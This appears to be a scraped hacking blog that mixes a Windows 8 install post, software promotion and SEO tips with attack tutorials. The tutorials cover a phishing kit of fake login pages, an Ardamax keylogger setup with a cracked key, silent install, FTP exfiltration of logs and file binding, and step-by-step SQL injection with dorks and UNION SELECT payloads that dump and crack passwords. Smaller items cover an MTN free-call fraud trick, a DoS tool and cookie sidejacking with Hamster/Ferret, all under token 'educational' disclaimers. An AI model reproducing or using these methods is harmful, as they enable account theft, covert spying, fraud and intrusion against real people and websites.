Yeah ...!! Finally The Day Arrive For Which Every Developer And A PC/Windows Users , In A Press Conference Today on 15th September 2011 Steven Sinofsky President OF Windows And Windows Live Division , Microsoft Has Announce The Windows 8 Day 1 Keynotes With all Of Its Preview And The New And Amazing Developers Tools.



How To Install Windows 8 Developer Preview From ISO Image :

Till now Windows Developer Preview is already downloaded by most of the users all over the world and is on your system so its time to know how to install Windows 8 from the ISO image you downloaded. There are some points which are essentials to keep in mind before starting the installation as:

Windows Developer Preview can’t be uninstalled.
Restore or installation media is needed to reinstall your previous operating system.

Points to think when installing Windows Developer Preview is which on which operating system you are installing this.

For Windows Developer Preview with developer tools:
If its Windows 7 or Windows Vista: Clean Install only
If its Windows XP: Clean Install only

For Windows Developer Preview (32-bit or 64-bit):
If its Windows 7 or Windows Vista: You can keep accounts, files, and settings
If its Windows XP: You can keep accounts, files




Note: Full set of installation options will be available only when setup is launched in Windows. A clean install is supported on all builds.
Installation Procedure:
Convert .iso into installation media by burning it to DVD or make USB flash drive bootable. In case of Windows 7 use inbuilt Windows Disc Image Burner. In case of Windows XP or Windows Vista, a third party program is needed for making installable media.
If you want to make installable media of .iso file which contains the developer tools than a large capacity DVD called a DVD-9, as well as a DVD burner that can handle dual-layer (DL) DVDs is required. Most modern burners should be able to handle this format.

Well talking with comparison to earlier Windows Operating System Windows 7 & Vista, this version in the series will need the same hardware for its proper working.

1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
16 GB available hard disk space (32-bit) or 20 GB (64-bit)
DirectX 9 graphics device with WDDM 1.0 or higher driver
Taking advantage of touch input requires a screen that supports multi-touch



Windows Developer Preview guide:
Downkoad PDF
Download XPS

Download Windows 8 ISO:
Windows Developer Preview with developer tools English, 64-bit (x64)
Windows Developer Preview English, 64-bit (x64)
Windows Developer Preview English, 32-bit (x86)

Revo Uninstaller - Just Throw Out Your Junk Software


Revo Uninstaller - Just Throw Out Your Junk Software

Its necessary to have some of the softwares compatible with your hardware and the system softwares, we use to install some of the them After their use we will uninstall but sometimes they were not competely remove from our system and that some of the junk software will completely make your system down and make our system unstable .

the reason of being the system down and the unstable because that some softwares will leave the some of the temporary files and the registery keys which leaves in the memory and make our system ill .

Today we will talk about the solution of this extreme problem which help you to keep your system fit and fine .the only solution for this issue is Revo Uninstaller which has been specially prefered by the system users worldwide this is the most cost effective and reliable tool to get rid of these types of junk softwares


Revo Uninstaller Pro helps you to uninstall software and remove unwanted programs installed on your computer even when you have problems uninstalling and cannot uninstall them from "Windows Add or Remove Programs" control panel applet.

The Uninstaller tool lists the installed programs and components for those and current user. With a range of sights, in addition to a context menu, info on program components can be obtained: program qualities, their registry records and links to manufacturer's site, to begin with. The "Search" option finds installed programs simply by typing the very first couple of letters of the title. Revo Uninstaller Professional scans for leftovers with much more advanced calculations which are so precise, fast and incredibly good at look for leftovers of Home windows Services, Motorists, File associations, Spend Extensions, COM components, Home windows Installer components, program configurations and much more!


You can download it for free from here : Click Here To Start Download

LATEST HACKED MTN FREE CALL

LATEST HACKED MTN FREE CALL NO DOUBT ABOUT IT ........STEP 1 >> GET AN OLD NOKIA PHONE LIKE NOKIA 3310 AND ITS FAMILIES. STEP 2 >> PUT YHUR MTN SIM INTO IT AND CALL ANY NUMBER. STEP 3 >> DIAL THE NUMBER AND ADD *333 AND SEND. E.g 0803000000*333 AND SEND...TESTED AND CONFIRMED

HOW TO CREATE A PHISHING ( FAKING PAGE )


Note: All the content on this blog site is for educational purposes.Haxorslodge will not be responsible for any harm caused by it.pls be ethical


INTRO

First i wanna tell u what is phishing .... Suppose you want to hack the facebook account of anyone , then to hack account u make a fake page of facebook which looks like the original one but is attached to your site .... u send this page to your friend saying anything like "hey new version of facebook,check the hidden pics of girls " . Now he must try to login on it . once he typed his pass and click login,he will redirect to the original facebook and his id and pass which he typed on the fake page will come to your online account . He even doesnt know that he has been hacked . Enjoy it.
How to do phishing :

How to create fake webpage in order 2 get da victim pass.

The Following File Includes Most Of The Famous Sites Fake Pages.First download it

>>> eBay

>>> Facebook

>>> Gmail

>>> Hi5

>>> AIM

>>> Hotmail

>>> Yahoo

>>> My Space

>>> Paypal

>>> FLV

>>> Photo Bucket

>>> Rapidshare

>>> Runescape


click here to download file


Note: All the content on this blog site is for educational purposes.Haxorslodge will not be responsible for any harm caused by it.Pls Be ethical

HACKING SOMEONE" PC USING KEYLOGGER

Ardamax Keylogger


Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8, reason being is because on Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", where as if you use Ardamax 2.8, it will just infect they're PC when they click it, nothing comes up, it'll just auto-install.

>> A- Getting Ardamax and Registering it.

Get Ardamax 2.8 or 2.9 (I HIGHLY recommend 2.8):

Ardamax Keylogger 2.8 (updated)
Ardamax Keylogger 2.9

Once downloaded, you'll see a little note-pad icon in your desk-top icon bar thing (bottom right of your screen), now right-hand.
Click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says.
Registration key :

Name: Membros
Key: CKPIUQDMITNVNRI
Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'



>> B- The Keylogger Engine.

>> Now your going to make the Keylogger Engine (The thing you send out over msn or whatever). Click 'Remote Installation...', now.

>> Click 'next' until you get to Appearences (it might come up straight away for Ardamax 2.9, but I can't be asked checking).
>> Now your at Appearences, click 'Additional components:' and un-tick 'Log Viewer' then click 'Next'.

>> Now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

>> Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.

>> Now you should be at 'Web Update', just click 'Next' when your here.
Ok, you should now be at 'Options', this all depends on you, if you want your Keylogger to be a secret on your computer so your family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'.

(Remember, if in future you want to make a new Keylogger Engine, then press: CTRL + SHIFT + ALT + H at the same time.)

Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only if log size exceeds', once thats done,
>> Now you should be at 'FTP', ok, creat a free account at DriveHQ.com, then make sure your at 'Online Storage', then make a new folder called: Logs

(this is where the logs are sent to when you keylogg someone)

>> Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this: http://ftp.drivehq.com/

>> Now where it says 'Remote Folder:', put this: Logs

>>> Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password
Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

>> You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.

>> Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.

>> Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger engine path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').

>> Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.

C- Binding the Keylogger with another file.

Download the Binding Tool:

Easy Binder 2.0

>> Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to 'My Documents' (or where-ever you put the Keylogger Engine) and then click the file called 'Install'.

>> Do the same again but don't add the Keylogger Engine (Install), add a picture or something.

>> You need to get a .ico image, this is easy, just go to http://www.chami.com/html-kit/services/favicon/ and upload the Image you want to be converted to .ico, once its done, click 'download'.

>> On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so.

>> Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.



D- Spread Through HTML
You can also spread it by HTML attck
the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.
All done, now everytime someone opens that webpage they would be infected with your trojan's serve

IF you have any problem.

Ask here.

SQL INJECTION


Note: All the content on this blog site is for educational purposes.Haxorslodge will not be responsible for any harm caused by it.


Uptill now,we have seen few terms related to hacking and some methods to hack passwords like phishing,keyloggers etc. Now we are moving a little forward.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites )

Ok buddiez lets start and kindly pay attention

let your mind think and its just a child play

1). SEARCH FOR A VUNELRABLE SITE.

Highlight one then press ctrl+c then ctrl+v at google search engine.

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
…and this one is just priceless…
“login: *” “password= *” filetype:xls

2)DEFINITIONS:

inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

3) So the url will be like this:

http://www.site.com/news_archive.php?id=5'
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.

4) FIND THE COLUNMS:

The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns

5) UNION SELECT:

Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
6, 5 8
6) CHECK MYSQL VERSION

Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6, 5
5.1.32 <--this is the version

7) GETTING TABLE NAME:

We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe
re+table_schema=database()--
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_u ser_md5

8) COLUNM NAME:

Now we're done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: http://home2.paulschou.net/tools/xlate/p
aste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
replace also +from+information_schema.tables+where+table_schema=database()--
to
+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status

9) MAIN PART :

We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10)Cracking the password :
Because the password is in md5 hash we need to crack it.
http://passcracking.com/index.php
pass: x1R0zYB3bex


Note: All the content on this blog site is for educational purposes.Haxorslodge will not be responsible for any harm caused by it.


IF YOU HAVE ANY QUESTION ASK HERE

SUBMIT YOUR BLOG TO SEARCH ENGINES


Search Engine Optimization (SEO) aims at increasing the volume and improving the quality of traffic to a website from search engine results. Search engines work on different algorithms to analyze the contents and keywords, and present the search results. Google, for instance, assigns page ranks to the sites and sites that rank highly will appear early in the results. Of course, many other factors are considered by search engines, such as relevance, unique content, coding and quality of links. The major search engines know that revealing these factors will only encourage manipulation of the ranking system and have thus been secretive about how the ranking algorithms work.

While no SEO consultant can be absolutely certain about how each search engine views your site, the common agreement is that the more visible your site is on the internet, the higher your ranking will eventually be. Having your site linked to by many other sites and indexed by different search engines increase its exposure and visibility

Here we shall provide a list of search engines where you can submit your website or Blog URLs for Free and have your site or Blog indexed by the search engines.

Website Indexing


Unless you have created a private blog, it is a matter of time that your blog is indexed by the major search engines like Google, Yahoo and MSN. One of the fastest ways to have your site indexed is to get another site that is already in the search engine listings to link to you. When the search engine crawlers visit that site, they will find your site and index it.

Hence, try this method if you do not want to wait for search engines to approve your site submission.

Before we proceed to the list of search engine sites, there are a few points to note:-

1. To check if your site has been indexed by a search engine, enter the full URL into their search query. For some search engines like Microsoft Live Search, enter site: followed by the full URL. If you see your site appearing in the search results, it has been indexed and there is no need to resubmit the site.

2. If your Blog has been linked to by Blog Directories, websites or Blogs, you may see these other sites that mention your Blog appearing first in the search results. More likely than not, they have a higher page rank. Scroll through the remaining search result pages and you will probably find a listing that is solely about your Blog.

3. When submitting your site, you do not need to submit the URL of each individual webpage. Submit only the top-level webpage and for Blogger Blogs, it will be an address like this http://blogname.blogspot.com without the www. before the blogname.

4. You can submit your sitemap to Google and login to Google Webmaster site to know the status of the indexing and view traffic statistics. Also, submit your sitemap to Yahoo! to find out more about the index and links to your site. Submit Blogger Sitemap to MSN and Ask.com too.

5. If you add your URL in Yahoo!, it will appear in their other search sites like AlltheWeb and AltaVista as well. Similarly, AOL Search uses the data by Google.

6. Some of the sites send advertisements and newsletters to you in exchange for free submission. If you don't want that, remember to opt out of it. Avoid having your regular email account filled with these mail by creating another free web-based email account just for website submissions.

7. Since search engines have different standards of content, design and technical specifications, submission of your site does not guarantee that it will be included in their database.

List of Search Engines

You may submit your site URL to these search engines for Free. If you lack the time, submit your site to the top few leading search engines.

http://www.google.com/addurl/.
http://www.bing.com/webmaster/SubmitSitePage.aspx.
http://www.alexa.com/help/webmasters#crawl_site.
http://www.baidu.com/search/url_submit.html.
http://www.exactseek.com/add.html.
http://searchsight.com/submit.htm.
http://www.scrubtheweb.com/addurl.html.
http://www.entireweb.com/free_submission/.
http://gigablast.com/addurl.
http://www.exalead.com/search/??definition=submitYourSitePage&nojs=1.
http://www.searchking.com/add_new.htm.
http://www.whatuseek.com/addurl-secondary.shtml.
http://www.anoox.com/add_for_indexing_free.jsp.
http://www.splatsearch.com/submit.html.
http://www.walhello.com/addlinkgl.html.
http://www.searchit.com/addurl.htm.
http://www.mozdex.com/support/addurl.html.
http://submit2.jayde.com/.
http://www.infotiger.com/addurl.html.
http://www.abacho.de/.
http://monster.exploituk.net/suspended.page/.
http://www.towersearch.com/addurl.php.
http://www.the-search-site.com/add_url_form.asp.
http://www.websquash.com/cgi-bin/search/search.pl?Mode=AnonAdd.
http://unasked.com/webmasters.
http://search.evisum.com/addsite.htm.
http://dinosearch.com/dinosearch/addurl.asp.
http://www.searchtheweb.com/suggest/.
http://www.bestyellow.com/addurl.html.
http://www.beamed.com/search/AddURL.html.


Website Submission Services


There are many sites on the internet offering free website submission services to search engines. The list of search engines are by and large the same. For a fee, some of them offer to send your URL to more than a hundred search engines. Is it necessary to have your webpage listed in all the smaller search engines? We think that Google, Yahoo! and MSN have cornered such a large share of the market that it is sufficient just to have your website listed there. However, the decision is yours to make. For a start, you may want to use their free services and monitor the traffic.


http://www.evrsoft.com/fastsubmit/.
http://www.submitexpress.com/.
http://www.addme.com/.
http://www.freesubmissionweb.com/.
http://www.ineedhits.com/free-tools/submit-free.aspx.
http://www.submitshop.com/freesubmit/freesubmit.html.
http://www.searchengineoptimising.com/free-search-engine-submission.
http://www.addpro.com/submit30.htm.
http://www.pageranklist.net/search_engine_add_url.php.
http://freewebsubmission.com/.
http://addurl.amfibi.com/.
http://www.burf.org.uk/submit.php.
http://submitforce.jerkasmarknad.com/.
http://www.localsubmit.com/free.asp.
http://www.srsubmit.info/.

BRING DOWN ANYSITE QUICK-WITH SPRUT- DOS

This program is able to bring down a Virtual Private Server in maximum 1hour. Me and other Sprut users were able to completly shut down a VPS in 10 min with a downtime of 1hour )after the program was exited.Remember always use a Proxy. But still its risky.
NOTE: its for educational purposes

SIDE JACKING - HACKING ACCOUNT ON LAN OR WIFI

Sidejacking is the process of sniffing cookie information, then replaying them against websites in order to clone a victim’s session. We use the term “sidejacking” to distinguish this technique from man-in-the-middle hijacking(Cain and Abel). Whereas man-in-the-middle hijacking interferes with the original session, sidejacking does not. The victim continues to use his/her session blissfully unaware that we are also in his/her account (although signs such as additional e-mails in the ‘sent’ folders might give a clue).

In this tut, I will explain the process of side jacking thru various tools with special focus on Hamster and FerretDisclaimer: Only for educational purposes

Contents:
I. SideJacking without hamster
-Ethereal/Wireshark, Cain And Abel, Network Miner

II SideJAcking with Hamster and Ferret
-Preparation
-Starting Up
-Using the console

I. Sidejacking without Hamster
All you need to do in order to sidejack is sniff cookies off the wire and edit cookies. This can be done with a wide variety of tools.

You should be comfortable with using a packet-sniffer like Wireshark/Ethereal. For example, the following is a screenshot of sniffing the cookie for Slashdot:

Another useful tool is an extension for Firefox called “Edit Cookies”. The following screens show what it looks like:
Once you can make your cookies the same in the browser that you sniffed from the wire, then you have sidejacked the person’s session. Note that the above information is correct, so that you can successfully sidejack our Slashdot test

You can use this erethreal method, another method can be using cain and abel, network miner and cookie editor which you can read here -> http://tinypaste.com/2b87c2
I am avoiding pasting that part here to focus on hamster and ferret.

II. Sidejacking without hamster and ferret
Now as you saw above the above process was quite cumbersome, especially if u want to repeatedly attack different users this would take a lot of time, to delete old cookies, try new ones and check. Also reading the erethreal dump is not easy hence, hamster is our wizard. So starting with it--->
Part A: Setting UP
Download HAmster and Ferret tools Here
http://rapidshare.com/files/381668823/ham.rar
These are command line tools, but for those afraid of command line, dont worry, u wont have to do much.
Unzio these into a directory that u can goto easily e.g. C:\hamster

Note:There is one major problem with the Intel® PRO/Wireless 2200BG and some other intel adapters: it doesn’t do promiscuous mode. This means that unlike most other wifi adapters, you can’t use it for sidejacking. To get around this, you would need to buy a cheap USB wifi adapter (usually 1000 rs)

First step is to set you’re a browser’s proxy to Hamster, which will be on port 3128. I strongly recommend that you DON’T use your normal browser, because Hamster totally screws up the cookies in the browser. There are 3 options I have used:
1. used Internet Explorer for sidejacking, because Firefox is my default browser
2. created a second account called “hamster” on my computer, and did the browsing from that account
3. used the alternate “profile” feature of Firefox to have two profiles running at the same time

I'll explain the third step in detail now-->
Firefox allows two profiles to be running at the same time. You can launch them from the command line as follows:







You will have to use these at c:\Program Files\Mozilla Firefox\
The following screen will popup






Click on create profile, select any name.. Next tym u start mozilla use that one for hamster.
Now open your created profile inn Firefox, go to the [Tools / Options] menu. Select the [advanced] Tab, open Network tab under it. Under connections click on settings. Now set up as following:








Set your proxy as shown at the left hand side

and click ok.

Part B. Starting Up
To run Ferret, open command prompt ( In administrator mode is better):
Goto ferret directory (C:\ham for e.g) and type ferret-W.








Now choose your wifi or LAN interface (u can try using the company names or try again)
Now type ferret.exe –i to start sniffing cookies
e.g ferret -i 4 for above one

Note(Only for those who understand):
You might also want to capture packets at the same time:

ferret.exe –i 4 sniffer.mode=most sniffer.directory=\pcaps

The advantage of sniffing packets at the same time is that you can later replay them through Ferret in order to generate a hamster.txt. The cookies last for a long time. To run a packet capture, do something like:

ferret -r \pcaps\sniff-2007-08-04-eth.pcap
Open another command prompt without closing the previous one ( Run as Administrator necessary)
Go to hamster directory(C:\ham for e.g.)
type 'hamster' and enter to start hamster proxy.
Now if you have already done the browser configuration as above move on to next part.
else set the browser proxy to 127.0.0.1 port 3128.

Part C. Using it!!
Open your configure browser and got to http://hamster/ remember NO . com or www in the name.
(If you get server not found, you didnt set proxy correctly or you didnt start hamster in cmd)
Now u get this






As Ferret is running in the background, it will be updating this list. You’ll need to manually refresh it to see if any information has been added.

In the right-hand window, you’ll get a list of targets. Most targets will have just the IP address. Some will have additional identifying information that Ferret finds. This identifying information is only names associated with the IP address, it’s not cookie information.

When you click on an IP address, you “clone” it. At this point, all the cookie are set for that IP address. Keep that in mind – a lot of problems people have is because they set the current IP address to something else, thereby erasing the cookies of a site they want to access.

Cloning an IP address by clicking on it will cause the window to the left to be filled in, as in the following example:







You have three options here. You can view the raw cookies for this IP address (discussed below). You can click on a URL that has a HIGHER probability of being Sidejacked. Or you can choose from the URLs below, which have a lower probability of being Sidejacked.

At this point, just click the URL. For example, I clicked on the http://slashdot.org URL in the above example, and the following window popped up:




The name “sidejacking” in the mid-left of that screenshot is because I created a test account with the username of “sidejacking”. This shows how I’ve successfully cloned the cookies to get to that Slashdot account.

Clicking on the Gmail one, I get the following screen:

And here is the Facebook account:






FootNotes:
When things work well, its point-and-click. They don’t always work well.

The first thing that sucks is you have to figure out which interface to sniff on and make sure that you have a proper wifi adapter. I recommend downloading Wireshark and make sure that you’ve got the packet sniffing working with that product before you start Ferret.

Both Ferret and Hamster will crash or hang. You’ll be restarting the programs a lot. Right now, Ferret overwrites ‘hamster.txt’ every time it restarts, so if you’ve got a good session, make copies of it (or log to sniffer files, and recreate it).

The Hamster proxy is really slow. You’ll click on a link and have to wait patiently sometimes. Check the Hamster console window in order to see what’s going on.

Cloning sites is finicky. Sometimes you have to choose the right URL from the list, and choosing the wrong URL will cause the server to reset the cookies, locking you (and the original person) out from the account until a re-login. It takes practice to figure out what you can, and cannot, clone.

Finally, when the original session cookies expire, you can’t clone them. This is rarely a problem in a live environment, but if you work from capture files, it becomes more difficult.

Completed!!
That is all you gotta know... Now u can try messing up your wifi or LAN network, also works in some broadbands and internet connections like airtel.
Comments andqueries are welcome.
Thanks!!
Credits: Hamster Creator himself (I used his Help file along with my editing).

And The content in tinypaste part is from HF